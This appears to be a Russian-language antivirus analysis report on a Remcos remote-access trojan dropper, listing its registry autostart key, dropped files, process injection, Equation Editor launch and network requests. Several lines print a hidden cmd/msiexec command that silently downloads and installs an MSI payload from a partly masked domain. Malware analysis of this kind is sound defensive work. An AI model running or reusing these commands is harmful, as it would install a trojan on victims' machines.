Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\RunOnce] 'Dvblindesk2' = '%HOMEPATH%\Iconotyp5\PROGRAM.vbs'
Вредоносные функции
Запускает на исполнение (эксплоит)
- '%WINDIR%\syswow64\cmd.exe' & /C CD C: & msiexec.exe /i http://ce####makmur.com/ii/remcosfire22_626.msi /quiet
Внедряет код в
следующие пользовательские процессы:
- program.exe
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\iconotyp5\program.exe
- %HOMEPATH%\iconotyp5\program.vbs
- %WINDIR%\syswow64\remos\logs.dat
Сетевая активность
TCP
Запросы HTTP GET
- http://ce####makmur.com/ii/remcosfire22_626.msi
- http://ce####makmur.com/ii/remcosFIRE22_encrypted_3D5D660.bin
UDP
- DNS ASK ce####makmur.com
Другое
Создает и запускает на исполнение
- '%WINDIR%\installer\msi95ad.tmp'
- '%HOMEPATH%\iconotyp5\program.exe'
- '%WINDIR%\syswow64\cmd.exe' & /C CD C: & msiexec.exe /i http://ce####makmur.com/ii/remcosfire22_626.msi /quiet' (со скрытым окном)
Запускает на исполнение
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\msiexec.exe' /i http://ce####makmur.com/ii/remcosfire22_626.msi /quiet
